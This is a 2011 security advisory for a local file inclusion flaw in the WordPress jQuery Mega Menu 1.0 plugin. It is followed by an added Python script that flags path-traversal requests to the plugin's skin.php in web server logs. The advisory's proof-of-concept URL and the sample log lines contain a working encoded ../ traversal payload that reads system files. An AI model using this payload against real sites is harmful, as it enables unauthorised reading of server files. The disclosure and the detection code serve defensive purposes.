WordPress Plugin jQuery Mega Menu 1.0 – Local File Inclusion

  • Author: AutoSec Tools
    Date: 2011-02-26
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/16250/
  • Source: http://packetstormsecurity.org/files/view/98753/WordPressjQueryMegaMenu1.0-lfi.txt
    
    ------------------------------------------------------------------------
    Software................WordPress jQuery Mega Menu 1.0
    Vulnerability...........Local File Inclusion
    Download................http://www.designchemical.com/blog/index.php/wordpress-plugins/wordpress-plugin-jquery-drop-down-mega-menu-widget/
    Release Date............2/25/2011
    Tested On...............Windows 7 + XAMPP
    ------------------------------------------------------------------------
    Author..................AutoSec Tools
    Site....................http://www.autosectools.com/
    ------------------------------------------------------------------------
    
    --Description--
    
    A local file inclusion vulnerability in WordPress jQuery Mega Menu 1.0
    can be exploited to include arbitrary files.
    
    
    --PoC--
    http://localhost/wordpress/wp-content/plugins/jquery-mega-menu/skin.php?skin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
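
Added example (not part of the original advisory or the plugin's code): a log check that flags requests to the plugin's `skin.php` whose `skin` parameter, after percent-decoding (including double encoding), is not a bare name. The combined log format, the sample lines and the rule that a valid skin is a bare identifier are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script path taken from the PoC URL; compared case-insensitively.
TARGET = "/wp-content/plugins/jquery-mega-menu/skin.php"
# Request field of a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate skin name is a bare identifier with no path parts.
SAFE_SKIN = re.compile(r"[A-Za-z0-9_-]+")

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input (%252f) is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_skin(uri):
    """Return the decoded skin value when a request to skin.php carries a
    skin parameter that is not a bare name; otherwise return None."""
    parts = urlsplit(uri)
    if not fully_decode(parts.path).lower().endswith(TARGET):
        return None
    for key, value in parse_qsl(parts.query):  # parse_qsl decodes one round
        skin = fully_decode(value)
        if key == "skin" and not SAFE_SKIN.fullmatch(skin):
            return skin
    return None

def scan(lines):
    """Return [(line_number, decoded_skin)] for every flagged log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        hit = suspicious_skin(m.group(1)) if m else None
        if hit is not None:
            hits.append((n, hit))
    return hits

# Constructed sample log lines (not real traffic); "grey" is a made-up skin name.
SAMPLE = [
    '203.0.113.5 - - [01/Mar/2011:10:00:00 +0000] "GET /wordpress/wp-content/plugins/jquery-mega-menu/skin.php?skin=grey HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Mar/2011:10:00:05 +0000] "GET /wordpress/wp-content/plugins/jquery-mega-menu/skin.php?skin=..%2f..%2fwindows%2fwin.ini HTTP/1.1" 200 403',
    '203.0.113.9 - - [01/Mar/2011:10:00:09 +0000] "GET /wordpress/wp-content/plugins/jquery-mega-menu/skin.php?skin=..%252f..%252fwindows%252fwin.ini HTTP/1.1" 200 403',
    '198.51.100.7 - - [01/Mar/2011:10:01:00 +0000] "GET /wordpress/index.php?skin=..%2f HTTP/1.1" 200 9000',
]
print(scan(SAMPLE))
```

Matching on the decoded value rather than on the raw `..%2f` string keeps the check from missing double-encoded or mixed-case variants of the same request.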